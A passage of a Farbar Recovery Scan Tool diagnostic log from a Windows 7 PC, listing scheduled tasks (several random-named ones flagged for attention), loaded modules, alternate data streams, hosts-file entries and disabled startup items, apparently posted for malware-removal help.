Task: {419D2F7F-6866-44C9-918F-9C7EEF756F06} - System32\Tasks\SBWUpdateTask_Logon_7481e473-00FFDD369F91 => C:\Program Files (x86)\Common Files\Speedbit\SbUpdate\SBUpdate.exe [2017-05-01] (Speedbit Ltd.) <==== ATTENTION
Task: {43DF4723-4BB3-4B0E-B719-0E467330A31F} - System32\Tasks\{0C469151-13B3-494B-A746-BD5E2CB90530} => F:\Games\Mafia II\pc\Mafia2.exe [2011-02-04] (2K Czech)
Task: {59F31DCF-1022-4FBB-B062-6155DD376030} - System32\Tasks\{25DA523B-4276-4B94-9F54-6B6F2F9BB0DC} => C:\Windows\system32\pcalua.exe -a "D:\Downloads\Might and Magic 8 - Day of the Destroyer\disk1\SETUP.EXE" -d "D:\Downloads\Might and Magic 8 - Day of the Destroyer\disk1"
Task: {5C0F6FAB-C543-47B7-8B37-1CB999B0A3F6} - System32\Tasks\GoogleUpdateTaskMachineUA1d1e954a9bce6e4 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {66314D17-1728-4DFF-93EA-99638DF73295} - System32\Tasks\SogouImeMgr => C:\Program Files (x86)\SogouInput\SogouExe\SogouExe.exe [2016-07-05] (Sogou.com Inc.)
Task: {73DDBEFC-98E4-41FC-8D01-59D749193B31} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2014-09-26] (Piriform Ltd)
Task: {74E7CA0C-4B28-4B51-B431-EAFEEC2EB294} - System32\Tasks\mjg2kyft => C:\Program Files\Common Files\0jkxweer\b2137hepploxh.exe <==== ATTENTION
Task: {87AE34E6-B14F-4AAB-A8E8-F1DEF741ED83} - System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-12-13] (NVIDIA Corporation)
Task: {881A0E55-4E38-49A5-9641-768766D0A535} - System32\Tasks\{DAD9CBED-549D-4F2C-8BF9-808CCD0C46DD} => J:\Games\Warhammer - End Times - Vermintide\launcher\launcher.exe
Task: {8884DD84-15D2-4DAA-B0B8-621FB4071B5A} - System32\Tasks\{7AAE58DB-FEDD-4709-80F1-4C47189C15DD} => C:\Windows\system32\pcalua.exe -a "F:\Red Alert 2 Yuri's Revenge Full Version\Yuri's Revenge\Setup\Setup.exe" -d "F:\Red Alert 2 Yuri's Revenge Full Version\Yuri's Revenge\Setup"
Task: {8D858AC0-A1AC-4B7E-ACBA-31A70FB01A58} - System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\NvContainer\nvcontainer.exe [2016-12-13] (NVIDIA Corporation)
Task: {901B998E-9819-4372-A93E-A2DD9E9B0D41} - System32\Tasks\{340AC26E-1C1D-4E6C-90B6-BD6F20B6CF52} => C:\Users\w7\Desktop\Setup.exe
Task: {93FDC8CF-79C9-4A13-B497-F9AD2F195CDB} - System32\Tasks\{36C6CD00-8371-4750-BB94-73D7CE8F8157} => C:\Program Files (x86)\ËæeÐÐWLAN\ËæeÐÐWLAN.exe [2014-06-20] (China Mobile)
Task: {97CE1122-7664-4679-8B4A-3CA552606766} - System32\Tasks\lar3es1h => C:\Program Files\Common Files\4eubx1r5\c15b9htfdo2ym.exe <==== ATTENTION
Task: {9EEB5A65-67A5-4770-9FE2-32B2315E3927} - System32\Tasks\{145128C2-7E78-4FC9-8DE6-F69DEC626214} => D:\Games\R.G. Catalyst\Might&Magic Heroes VI\Might & Magic Heroes VI.exe [2013-04-25] (Virtuos)
Task: {A84E3583-0BE1-4E8C-91C2-B7971B26FF7B} - System32\Tasks\{62D93F64-B9ED-4595-992B-3F5FE86F8A70} => C:\Windows\system32\pcalua.exe -a C:\Users\w7\Downloads\seita.exe -d C:\Users\w7\Downloads
Task: {A9EA78CA-1B28-4A2A-9155-8E664E47C2DD} - System32\Tasks\{E6A1A9E4-74B3-4DE1-A266-4462ACC3D0C7} => C:\Windows\system32\pcalua.exe -a H:\Setup.exe -d H:\
Task: {AA09BD39-5C41-4061-B07B-BF3E8C1098F5} - System32\Tasks\GoogleUpdateTaskMachineCore1cff2c37ee024d1 => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {AE947B6B-B166-4B74-876F-CD6436C4FE20} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2015-08-29] (Google Inc.)
Task: {C3A4EAAF-8237-4FAA-9680-EDB028564D41} - System32\Tasks\inyraupuat => C:\Windows\system32\config\systemprofile\AppData\Local\Stimtandax [Argument = /t 1632 2932] <==== ATTENTION
Task: {CB812416-FC8E-48AA-9C99-246D98AA6138} - System32\Tasks\{549E870F-3A61-4E72-AE24-36E2173BC051} => C:\Windows\system32\pcalua.exe -a C:\Users\w7\Downloads\vcredist_x86.exe -d C:\Users\w7\Downloads
Task: {CEC86FC3-55E6-4DC2-866E-7701B5B8A8D4} - System32\Tasks\Synaptics TouchPad Enhancements => Program Files\Synaptics\SynTP\SynTPEnh.exe
Task: {D4C9C383-D2FD-4DC8-9DCA-3639AFA37B10} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [2016-12-13] (NVIDIA Corporation)
Task: {E6D93E7E-0484-4ED9-A4D9-F0E74CFAD0E2} - System32\Tasks\{3C2C09C0-2730-45A4-9529-26B7382549A7} => J:\Supreme Commander 2\bin\SupremeCommander2.exe
Task: {EBCEB8D1-658F-4BDA-BB64-8B84735D76E4} - System32\Tasks\{417D708E-D95D-4567-BEA1-C8D34A63673C} => D:\Downloads\Might and Magic 8 - Day of the Destroyer\disk1\SETUP.EXE
Task: {F1D00AF5-BFE1-452E-B728-8F4317B79342} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [2016-12-13] (NVIDIA Corporation)
Task: {FE717329-F074-4198-9C97-DEEBF3950998} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [2016-12-13] (NVIDIA Corporation)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
 
==================== Shortcuts & WMI ========================
 
(The entries could be listed to be restored or removed.)
 
 
Shortcut: C:\Users\w7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Minecraft\Minecraft Debugger.lnk -> C:\Users\w7\AppData\Roaming\.minecraft\minecraft launcher\Debug.bat ()
Shortcut: C:\Users\w7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Golden Axe (1990)\Friend in War\Golden Axe (1990)\Golden Axe (1990).lnk -> C:\Friend in War\Golden Axe (1990)\start.bat ()
Shortcut: C:\Users\w7\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Friend in War\Golden Axe (1990)\Golden Axe (1990).lnk -> C:\Friend in War\Golden Axe (1990)\start.bat ()
 
==================== Loaded Modules (Whitelisted) ==============
 
2014-08-31 13:12 - 2016-12-12 10:37 - 000018880 _____ () C:\Program Files\NVIDIA Corporation\CoProcManager\detoured.dll
2014-08-31 13:12 - 2016-12-12 02:47 - 000134712 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2017-06-04 16:32 - 2015-10-10 13:00 - 000707624 _____ () C:\Users\w7\AppData\Roaming\ytmediacenter\X64\cmc64.dll
2015-03-07 08:07 - 2015-03-07 08:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2016-09-30 05:13 - 2016-09-30 05:13 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 08:07 - 2015-03-07 08:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2016-09-30 05:13 - 2016-09-30 05:13 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2016-12-14 11:47 - 2016-12-13 07:35 - 001147328 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-12-14 11:47 - 2016-12-13 07:36 - 004489152 _____ () C:\Program Files\NVIDIA Corporation\NvContainer\Poco.dll
2016-05-11 08:48 - 2016-05-11 08:48 - 000041472 _____ () C:\Program Files (x86)\TunnelBear\TBear.Maintenance.exe
2016-04-27 12:25 - 2013-11-18 11:44 - 000585416 _____ () C:\Program Files (x86)\Android_USB_Driver_Z\Bin\MonServiceUDisk.exe
2017-08-03 15:18 - 2017-06-27 12:06 - 002260432 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2017-08-10 12:17 - 2017-08-07 19:30 - 000018840 _____ () C:\Program Files (x86)\StrongVPN\CrashReporter.dll
2017-08-08 21:58 - 2017-08-02 15:39 - 003824472 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.90\libglesv2.dll
2017-08-08 21:58 - 2017-08-02 15:39 - 000100184 _____ () C:\Program Files (x86)\Google\Chrome\Application\60.0.3112.90\libegl.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000152000 _____ () C:\Program Files\VideoLAN\VLC\libvlc.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 002763200 _____ () C:\Program Files\VideoLAN\VLC\libvlccore.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000626624 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdshow_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000046016 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libdirectsound_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_output\libwaveout_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirect3d_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000083392 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_output\libdirectdraw_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 002568640 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\liblibbluray_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000118720 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libaccess_bd_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000267712 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libdvdnav_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000091072 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libvdr_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000059328 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libfilesystem_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000074176 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libsmooth_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000684480 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libhttplive_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000833984 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\libdash_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000140224 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\libzip_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000055232 _____ () C:\Program Files\VideoLAN\VLC\plugins\access\librar_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\stream_filter\librecord_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000150464 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libplaylist_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 001605056 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libtaglib_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000349120 _____ () C:\Program Files\VideoLAN\VLC\plugins\lua\liblua_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 001487808 _____ () C:\Program Files\VideoLAN\VLC\plugins\misc\libxml_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000028608 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_msg_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libhotkeys_plugin.dll
2016-06-01 22:45 - 2016-06-01 22:45 - 000238016 _____ () C:\Program Files\VideoLAN\VLC\plugins\demux\libmp4_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000051648 _____ () C:\Program Files\VideoLAN\VLC\plugins\control\libwin_hotkeys_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 012298176 _____ () C:\Program Files\VideoLAN\VLC\plugins\gui\libqt4_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\meta_engine\libfolder_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000330688 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libjpeg_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libcdg_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000347584 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libpng_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 001521088 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libschroedinger_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000844736 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libvorbis_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000339392 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libtheora_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000032704 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdts_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000049600 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaraw_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000056256 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libsubstx3g_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000437696 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libflac_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000038848 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libg711_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000028096 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libaes3_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000199616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspeex_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 003009472 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblibass_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000426432 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libfaad_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000031680 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liba52_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000031168 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libmpeg_audio_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000035264 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\liblpcm_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000455616 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libopus_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000135104 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libdvbsub_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 000032192 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libspudec_plugin.dll
2016-06-01 22:47 - 2016-06-01 22:47 - 015975872 _____ () C:\Program Files\VideoLAN\VLC\plugins\codec\libavcodec_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000916928 _____ () C:\Program Files\VideoLAN\VLC\plugins\text_renderer\libfreetype_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000051136 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_sse2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000037824 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_mmx_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000816576 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libswscale_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000041920 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_sse2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000133056 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_sse2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000068032 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_mmx_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_mmx_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000046528 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i422_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000030656 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libgrey_yuv_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000059840 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libyuy2_i420_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000042944 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_yuy2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000053696 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_yuy2_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_mixer\libfloat_mixer_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000043456 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi420_rgb_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000034240 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libscaletempo_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_chroma\libi422_i420_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 001515456 _____ () C:\Program Files\VideoLAN\VLC\plugins\audio_filter\libsamplerate_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000027072 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libscale_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000026560 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libyuvp_plugin.dll
2016-06-01 22:46 - 2016-06-01 22:46 - 000033216 _____ () C:\Program Files\VideoLAN\VLC\plugins\video_filter\libsharpen_plugin.dll
2015-09-16 11:25 - 2015-09-16 11:25 - 000367104 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDDU.dll
2015-09-16 11:13 - 2015-09-16 11:13 - 003585536 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxRT.dll
2016-05-27 15:07 - 2016-05-27 15:07 - 000163816 _____ () C:\Program Files\Bignox\BigNoxVM\RT\NoxVMHandle.exe
2015-09-16 11:29 - 2015-09-16 11:29 - 002460160 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxVMM.DLL
2015-09-16 11:30 - 2015-09-16 11:30 - 000662016 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxREM.dll
2015-09-16 11:29 - 2015-09-16 11:29 - 000021504 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxSharedClipboard.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000038400 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDragAndDropSvc.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000039936 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxGuestPropSvc.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000037376 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxGuestControlSvc.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 001480192 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDD.DLL
2015-09-16 11:29 - 2015-09-16 11:29 - 000192512 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxDD2.dll
2016-02-26 15:56 - 2016-02-26 15:56 - 000034816 _____ () C:\Program Files\Bignox\BigNoxVM\RT\NOXa.dll
2015-09-16 11:29 - 2015-09-16 11:29 - 000032256 _____ () C:\Program Files\Bignox\BigNoxVM\RT\VBoxSharedFolders.DLL
2016-08-09 03:55 - 2016-08-09 03:55 - 000815104 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\nox_adb.exe
2014-08-31 13:12 - 2016-12-12 10:37 - 000020536 _____ () C:\Program Files (x86)\NVIDIA Corporation\CoProcManager\detoured.dll
2017-02-16 19:19 - 2017-02-16 19:19 - 040622592 _____ () C:\Program Files (x86)\Letv\libcef.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000524720 _____ () C:\Program Files (x86)\Letv\DuiLib.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000318896 _____ () C:\Program Files (x86)\Letv\curllib.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000316336 _____ () C:\Program Files (x86)\Letv\CommDll.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000318896 _____ () C:\Users\w7\AppData\Roaming\Letv\AfterPlay\curllib.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000316336 _____ () C:\Users\w7\AppData\Roaming\Letv\AfterPlay\CommDll.dll
2017-02-16 19:20 - 2017-02-16 19:20 - 000524720 _____ () C:\Users\w7\AppData\Roaming\Letv\AfterPlay\DuiLib.dll
2016-12-14 11:47 - 2016-12-13 07:35 - 000900032 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\libprotobuf.dll
2016-12-14 11:47 - 2016-12-13 07:35 - 003774400 _____ () C:\Program Files (x86)\NVIDIA Corporation\NvContainer\Poco.dll
2016-12-14 11:47 - 2016-12-12 22:36 - 000525760 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSpCapsAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000254008 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\DriverInstall.node
2016-12-14 11:47 - 2016-12-12 22:36 - 002808888 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\Downloader.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000384568 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGameShareAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000447424 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvGalleryAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 000336832 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NVAccountAPINode.node
2016-12-14 11:47 - 2016-12-12 22:36 - 001003456 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvCameraAPINode.node
2016-12-22 13:46 - 2016-12-12 22:36 - 000956472 _____ () \\?\C:\Program Files (x86)\NVIDIA Corporation\NvNode\NvSDKAPINode.node
2014-08-31 13:07 - 2013-12-09 15:26 - 001242584 _____ () C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\ACE.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000117262 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\libgcc_s_dw2-1.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 001026574 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\libstdc++-6.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 003758827 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\icuin53.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 002093901 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\icuuc53.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 003327416 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\icudt53.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000007168 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\firewall_mgr.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000169984 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\glut32.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000184320 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\NoxCommon.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000243200 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\VBoxApi.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000498688 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\hlog4qt1.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000019456 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\QtQuick.2\qtquick2plugin.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000900608 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\QtQuick\Controls\qtquickcontrolsplugin.dll
2016-08-09 03:55 - 2016-08-09 03:55 - 000039424 _____ () C:\Users\w7\AppData\Roaming\Nox\bin\QtWebKit\qmlwebkitplugin.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
AlternateDataStreams: C:\ProgramData\TEMP:05E9FFE5 [99]
AlternateDataStreams: C:\ProgramData\TEMP:56E2E879 [86]
AlternateDataStreams: C:\ProgramData\TEMP:D5FBE8F9 [336]
AlternateDataStreams: C:\ProgramData\TEMP:DBC416F8 [86]
AlternateDataStreams: C:\Users\w7\Downloads\Naruto Shippuden 3D: The New Era *MULTi5* *READNFO* - (PortableROMs.com).rar [412830574]
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
 
==================== Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
IE trusted site: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\bankofchina.com -> hxxp://www.bankofchina.com
IE trusted site: HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\...\boc.cn -> hxxps://ebs.boc.cn
 
==================== Hosts content: ==========================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2009-07-14 10:34 - 2017-08-04 14:42 - 000001677 ____R C:\Windows\system32\Drivers\etc\hosts
 
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       union.baidu2019.com
127.0.0.1       down.baidu2016.com
127.0.0.1       123.sogou.com
127.0.0.1       www.czzsyzgm.com
127.0.0.1       www.czzsyzxl.com
127.0.0.1       union.baidu2019.com
0.0.0.0                   telemetry.malwarebytes.com
192.168.1.101 windows10.microdone.cn0.0.0.0                   keystone.mwbsys.com
192.168.1.101 windows10.microdone.cn
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-1997723473-3802709511-3419621205-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\w7\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 221.7.128.68 - 221.7.136.68
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^G3Server.lnk => C:\Windows\pss\G3Server.lnk.CommonStartup
MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^Killer Network Manager.lnk => C:\Windows\pss\Killer Network Manager.lnk.CommonStartup
MSCONFIG\startupfolder: C:^Users^w7^AppData^Roaming^Microsoft^Windows^Start Menu^Programs^Startup^MagicDisc.lnk => C:\Windows\pss\MagicDisc.lnk.Startup
